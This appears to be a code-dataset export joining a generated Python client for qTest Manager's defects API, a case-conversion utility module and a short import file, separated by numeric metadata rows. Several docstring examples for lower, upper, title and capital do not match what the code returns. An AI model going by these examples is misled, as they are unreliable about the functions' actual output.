>>> thread = api.get_comment_with_http_info(project_id, id_or_key, comment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect whose comment you want to retrieve (required)
:param int comment_id: ID of the comment (required)
:return: CommentResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'id_or_key', 'comment_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_comment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `get_comment`")
# verify the required parameter 'id_or_key' is set
if ('id_or_key' not in params) or (params['id_or_key'] is None):
raise ValueError("Missing the required parameter `id_or_key` when calling `get_comment`")
# verify the required parameter 'comment_id' is set
if ('comment_id' not in params) or (params['comment_id'] is None):
raise ValueError("Missing the required parameter `comment_id` when calling `get_comment`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments/{commentId}'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'id_or_key' in params:
path_params['idOrKey'] = params['id_or_key']
if 'comment_id' in params:
path_params['commentId'] = params['comment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CommentResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_comments(self, project_id, id_or_key, **kwargs):
"""
Gets all Comments of a Defect
To retrieve all Comments of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_comments(project_id, id_or_key, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect whose comments you want to retrieve (required)
:param int page: By default the first page is returned but you can specify any page number to retrieve objects
:param int page_size: The result is paginated. By the default, the number of objects in each page is 100 if this is omitted. You can specify your custom number (up to 999) in this parameter
:return: PagedResourceCommentResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_comments_with_http_info(project_id, id_or_key, **kwargs)
else:
(data) = self.get_comments_with_http_info(project_id, id_or_key, **kwargs)
return data
def get_comments_with_http_info(self, project_id, id_or_key, **kwargs):
"""
Gets all Comments of a Defect
To retrieve all Comments of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_comments_with_http_info(project_id, id_or_key, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect whose comments you want to retrieve (required)
:param int page: By default the first page is returned but you can specify any page number to retrieve objects
:param int page_size: The result is paginated. By the default, the number of objects in each page is 100 if this is omitted. You can specify your custom number (up to 999) in this parameter
:return: PagedResourceCommentResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'id_or_key', 'page', 'page_size']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_comments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `get_comments`")
# verify the required parameter 'id_or_key' is set
if ('id_or_key' not in params) or (params['id_or_key'] is None):
raise ValueError("Missing the required parameter `id_or_key` when calling `get_comments`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'id_or_key' in params:
path_params['idOrKey'] = params['id_or_key']
query_params = {}
if 'page' in params:
query_params['page'] = params['page']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagedResourceCommentResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_defect(self, project_id, defect_id, **kwargs):
"""
Gets a Defect
To retrieve a Defect <strong>qTest Manager version:</strong> 6+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_defect(project_id, defect_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str defect_id: ID of the defect. (required)
:return: DefectResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_defect_with_http_info(project_id, defect_id, **kwargs)
else:
(data) = self.get_defect_with_http_info(project_id, defect_id, **kwargs)
return data
def get_defect_with_http_info(self, project_id, defect_id, **kwargs):
"""
Gets a Defect
To retrieve a Defect <strong>qTest Manager version:</strong> 6+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_defect_with_http_info(project_id, defect_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str defect_id: ID of the defect. (required)
:return: DefectResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'defect_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_defect" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `get_defect`")
# verify the required parameter 'defect_id' is set
if ('defect_id' not in params) or (params['defect_id'] is None):
raise ValueError("Missing the required parameter `defect_id` when calling `get_defect`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/{defectId}'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'defect_id' in params:
path_params['defectId'] = params['defect_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DefectResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_last_changed(self, project_id, start_time, **kwargs):
"""
Gets recently updated Defects
To retrieve Defects which have been recently updated after a specified time
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_last_changed(project_id, start_time, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str start_time: The specified time since when the Defects have been updated. It needs to be URL encoded: <em>yyyy-MM-dd'T'HH:mm:ss.SSSZ</em> or <em>yyyy-MM-dd'T'HH:mm:ssZZ</em> (required)
:param str end_time: Do not support at this time. Use the current time only.
:param int size: The result is paginated. By the default, the number of objects in each page is 100. You can specify your custom number in this parameter. The maximum page size is 999.
:param int page: By default the first page is returned but you can specify any page number to retrieve objects
:return: list[DefectResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_last_changed_with_http_info(project_id, start_time, **kwargs)
else:
(data) = self.get_last_changed_with_http_info(project_id, start_time, **kwargs)
return data
def get_last_changed_with_http_info(self, project_id, start_time, **kwargs):
"""
Gets recently updated Defects
To retrieve Defects which have been recently updated after a specified time
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_last_changed_with_http_info(project_id, start_time, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str start_time: The specified time since when the Defects have been updated. It needs to be URL encoded: <em>yyyy-MM-dd'T'HH:mm:ss.SSSZ</em> or <em>yyyy-MM-dd'T'HH:mm:ssZZ</em> (required)
:param str end_time: Do not support at this time. Use the current time only.
:param int size: The result is paginated. By the default, the number of objects in each page is 100. You can specify your custom number in this parameter. The maximum page size is 999.
:param int page: By default the first page is returned but you can specify any page number to retrieve objects
:return: list[DefectResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'start_time', 'end_time', 'size', 'page']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_last_changed" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `get_last_changed`")
# verify the required parameter 'start_time' is set
if ('start_time' not in params) or (params['start_time'] is None):
raise ValueError("Missing the required parameter `start_time` when calling `get_last_changed`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/last-change'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
query_params = {}
if 'start_time' in params:
query_params['startTime'] = params['start_time']
if 'end_time' in params:
query_params['endTime'] = params['end_time']
if 'size' in params:
query_params['size'] = params['size']
if 'page' in params:
query_params['page'] = params['page']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DefectResource]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def submit_defect(self, project_id, body, **kwargs):
"""
Submit a Defect
To submit an internal Defect
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.submit_defect(project_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param DefectResource body: <em>properties:</em> a JSONArray of field-value pairs <em>attachments:</em> a JSONArray of Attachment objects (required)
:return: DefectResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.submit_defect_with_http_info(project_id, body, **kwargs)
else:
(data) = self.submit_defect_with_http_info(project_id, body, **kwargs)
return data
def submit_defect_with_http_info(self, project_id, body, **kwargs):
"""
Submit a Defect
To submit an internal Defect
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.submit_defect_with_http_info(project_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param DefectResource body: <em>properties:</em> a JSONArray of field-value pairs <em>attachments:</em> a JSONArray of Attachment objects (required)
:return: DefectResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method submit_defect" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `submit_defect`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `submit_defect`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DefectResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_comment(self, project_id, id_or_key, comment_id, body, **kwargs):
"""
Updates a Comment of a Defect
To update a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_comment(project_id, id_or_key, comment_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the defect whose comment you want to update (required)
:param int comment_id: ID of the comment (required)
:param CommentResource body: Given resource to update a comment. (required)
:return: CommentResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_comment_with_http_info(project_id, id_or_key, comment_id, body, **kwargs)
else:
(data) = self.update_comment_with_http_info(project_id, id_or_key, comment_id, body, **kwargs)
return data
def update_comment_with_http_info(self, project_id, id_or_key, comment_id, body, **kwargs):
"""
Updates a Comment of a Defect
To update a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_comment_with_http_info(project_id, id_or_key, comment_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the defect whose comment you want to update (required)
:param int comment_id: ID of the comment (required)
:param CommentResource body: Given resource to update a comment. (required)
:return: CommentResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'id_or_key', 'comment_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_comment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `update_comment`")
# verify the required parameter 'id_or_key' is set
if ('id_or_key' not in params) or (params['id_or_key'] is None):
raise ValueError("Missing the required parameter `id_or_key` when calling `update_comment`")
# verify the required parameter 'comment_id' is set
if ('comment_id' not in params) or (params['comment_id'] is None):
raise ValueError("Missing the required parameter `comment_id` when calling `update_comment`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_comment`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments/{commentId}'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'id_or_key' in params:
path_params['idOrKey'] = params['id_or_key']
if 'comment_id' in params:
path_params['commentId'] = params['comment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CommentResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_defect(self, project_id, defect_id, body, **kwargs):
"""
Updates a Defect
To update a Defect <strong>qTest Manager version:</strong> 6+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_defect(project_id, defect_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param int defect_id: ID of the Defect which needs to be updated. (required)
:param DefectResource body: The Defect's updated properties (required)
:return: DefectResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_defect_with_http_info(project_id, defect_id, body, **kwargs)
else:
(data) = self.update_defect_with_http_info(project_id, defect_id, body, **kwargs)
return data
def update_defect_with_http_info(self, project_id, defect_id, body, **kwargs):
"""
Updates a Defect
To update a Defect <strong>qTest Manager version:</strong> 6+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_defect_with_http_info(project_id, defect_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param int defect_id: ID of the Defect which needs to be updated. (required)
:param DefectResource body: The Defect's updated properties (required)
:return: DefectResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'defect_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_defect" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `update_defect`")
# verify the required parameter 'defect_id' is set
if ('defect_id' not in params) or (params['defect_id'] is None):
raise ValueError("Missing the required parameter `defect_id` when calling `update_defect`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_defect`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/{defectId}'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'defect_id' in params:
path_params['defectId'] = params['defect_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DefectResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.281664
| 203
| 0.577268
| 5,643
| 51,082
| 5.01081
| 0.043417
| 0.042969
| 0.018567
| 0.022917
| 0.973334
| 0.961133
| 0.958092
| 0.95261
| 0.9478
| 0.940197
| 0
| 0.002145
| 0.343017
| 51,082
| 1,057
| 204
| 48.327342
| 0.840405
| 0.351885
| 0
| 0.781784
| 1
| 0
| 0.204073
| 0.038028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036053
| false
| 0
| 0.013283
| 0
| 0.102467
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79662dfebfc4d3b45fa5c9225f73eb241645f17c
| 8,781
|
py
|
Python
|
case_conversion/converter.py
|
AlejandroFrias/case-conversion
|
a62128c14691e87865435ae56c15119f38de65c5
|
[
"MIT"
] | 18
|
2016-05-03T19:33:05.000Z
|
2022-03-25T14:37:14.000Z
|
case_conversion/converter.py
|
AlejandroFrias/case-conversion
|
a62128c14691e87865435ae56c15119f38de65c5
|
[
"MIT"
] | 21
|
2016-12-13T10:30:52.000Z
|
2021-05-13T15:32:35.000Z
|
case_conversion/converter.py
|
AlejandroFrias/case-conversion
|
a62128c14691e87865435ae56c15119f38de65c5
|
[
"MIT"
] | 7
|
2016-07-24T13:14:51.000Z
|
2022-02-06T12:39:36.000Z
|
from typing import List, Optional
from .parser import parse_case
def camel(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in camelCase style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> camel("hello world")
'helloWorld'
>>> camel("HELLO_HTML_WORLD", ["HTML"])
'helloHTMLWorld'
"""
words, *_ = parse_case(text, acronyms)
if words:
words[0] = words[0].lower()
return "".join(words)
def pascal(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in PascalCase style.
This case style is also known as: MixedCase
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> pascal("hello world")
'HelloWorld'
>>> pascal("HELLO_HTML_WORLD", ["HTML"])
'HelloHTMLWorld'
"""
words, *_ = parse_case(text, acronyms)
return "".join(words)
def snake(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in snake_case style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honort
Returns:
str: Case converted text
Examples:
>>> snake("hello world")
'hello_world'
>>> snake("HelloHTMLWorld", ["HTML"])
'hello_html_world'
"""
words, *_ = parse_case(text, acronyms)
return "_".join([w.lower() for w in words])
def dash(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in dash-case style.
This case style is also known as: kebab-case, spinal-case, slug-case
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> dash("hello world")
'hello-world'
>>> dash("HelloHTMLWorld", ["HTML"])
'hello-html-world'
"""
words, *_ = parse_case(text, acronyms)
return "-".join([w.lower() for w in words])
def const(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in CONST_CASE style.
This case style is also known as: SCREAMING_SNAKE_CASE
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> const("hello world")
'HELLO_WORLD'
>>> const("helloHTMLWorld", ["HTML"])
'HELLO_HTML_WORLD'
"""
words, *_ = parse_case(text, acronyms)
return "_".join([w.upper() for w in words])
def dot(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in dot.case style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> dot("hello world")
'hello.world'
>>> dot("helloHTMLWorld", ["HTML"])
'hello.html.world'
"""
words, *_ = parse_case(text, acronyms)
return ".".join([w.lower() for w in words])
def separate_words(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in "seperate words" style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> separate_words("HELLO_WORLD")
'HELLO WORLD'
>>> separate_words("helloHTMLWorld", ["HTML"])
'hello HTML World'
"""
words, *_ = parse_case(text, acronyms, preserve_case=True)
return " ".join(words)
def slash(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in slash/case style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> slash("HELLO_WORLD")
'HELLO/WORLD'
>>> slash("helloHTMLWorld", ["HTML"])
'hello/HTML/World'
"""
words, *_ = parse_case(text, acronyms, preserve_case=True)
return "/".join(words)
def backslash(text: str, acronyms: Optional[List[str]] = None) -> str:
r"""Return text in backslash\case style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> backslash("HELLO_WORLD")
r'HELLO\WORLD'
>>> backslash("helloHTMLWorld", ["HTML"])
r'hello\HTML\World'
"""
words, *_ = parse_case(text, acronyms, preserve_case=True)
return "\\".join(words)
def ada(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in Ada_Case style.
This case style is also known as: Camel_Snake
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> ada("hello_world")
Hello_World
>>> ada("helloHTMLWorld", ["HTML"])
Hello_HTML_World
"""
words, *_ = parse_case(text, acronyms)
return "_".join([w.capitalize() for w in words])
def http_header(text: str, acronyms: Optional[List[str]] = None) -> str:
"""Return text in Http-Header-Case style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> http_header("hello_world")
Hello-World
>>> http_header("helloHTMLWorld", ["HTML"])
Hello-HTML-World
"""
words, *_ = parse_case(text, acronyms)
return "-".join([w.capitalize() for w in words])
def lower(text: str, *args, **kwargs) -> str:
"""Return text in lowercase style.
This is a convenience function wrapping inbuilt lower().
It features the same signature as other conversion functions.
Note: Acronyms are not being honored.
Args:
text (str): Input string to be converted
args : Placeholder to conform to common signature
kwargs : Placeholder to conform to common signature
Returns:
str: Case converted text
Examples:
>>> lower("HELLO_WORLD")
hello_world
>>> lower("helloHTMLWorld", ["HTML"])
Hello_HTML_world
"""
return text.lower()
def upper(text: str, *args, **kwargs) -> str:
"""Return text in UPPERCASE style.
This is a convenience function wrapping inbuilt upper().
It features the same signature as other conversion functions.
Note: Acronyms are not being honored.
Args:
text (str): Input string to be converted
args : Placeholder to conform to common signature
kwargs : Placeholder to conform to common signature
Returns:
str: Case converted text
Examples:
>>> upper("hello_world")
HELLO_WORLD
>>> upper("helloHTMLWorld", ["HTML"])
Hello_HTML_world
"""
return text.upper()
def title(text: str, *args, **kwargs) -> str:
"""Return text in Title_case style.
This is a convenience function wrapping inbuilt title().
It features the same signature as other conversion functions.
Note: Acronyms are not being honored.
Args:
text (str): Input string to be converted
args : Placeholder to conform to common signature
kwargs : Placeholder to conform to common signature
Returns:
str: Case converted text
Examples:
>>> title("hello_world")
Hello_world
>>> title("helloHTMLWorld", ["HTML"])
Hello_HTML_world
"""
return text.title()
def capital(text: str, *args, **kwargs) -> str:
"""Return text in Capital case style.
This is a convenience function wrapping inbuilt capitalize().
It features the same signature as other conversion functions.
Note: Acronyms are not being honored.
Args:
text (str): Input string to be converted
args : Placeholder to conform to common signature
kwargs : Placeholder to conform to common signature
Returns:
str: Case converted text
Examples:
>>> capital("hello_world")
HELLO_WORLD
>>> capital("helloHTMLWorld", ["HTML"])
Hello_HTML_world
"""
return text.capitalize()
| 26.609091
| 75
| 0.61075
| 1,061
| 8,781
| 4.983035
| 0.089538
| 0.03972
| 0.083223
| 0.045394
| 0.822016
| 0.819368
| 0.812748
| 0.779081
| 0.724608
| 0.685833
| 0
| 0.000314
| 0.274001
| 8,781
| 329
| 76
| 26.68997
| 0.82902
| 0.651862
| 0
| 0.304348
| 0
| 0
| 0.004492
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326087
| false
| 0
| 0.043478
| 0
| 0.695652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
798a815aa120afe24209666491527feb1355ccc6
| 100
|
py
|
Python
|
core/auth/local/__init__.py
|
yeti-threatintel/yeti
|
9e8b76cd393f149c4990ead003902eac50c1766d
|
[
"Apache-2.0"
] | 1,250
|
2017-03-12T16:20:47.000Z
|
2022-03-29T02:12:11.000Z
|
core/auth/local/__init__.py
|
yeti-threatintel/yeti
|
9e8b76cd393f149c4990ead003902eac50c1766d
|
[
"Apache-2.0"
] | 540
|
2017-03-20T16:45:35.000Z
|
2022-03-22T16:55:02.000Z
|
core/auth/local/__init__.py
|
yeti-threatintel/yeti
|
9e8b76cd393f149c4990ead003902eac50c1766d
|
[
"Apache-2.0"
] | 293
|
2017-03-20T13:59:07.000Z
|
2022-03-28T16:00:10.000Z
|
from core.auth.local.views import auth
from core.auth.local.user_management import get_default_user
| 33.333333
| 60
| 0.86
| 17
| 100
| 4.882353
| 0.588235
| 0.192771
| 0.289157
| 0.409639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 100
| 2
| 61
| 50
| 0.902174
| 0
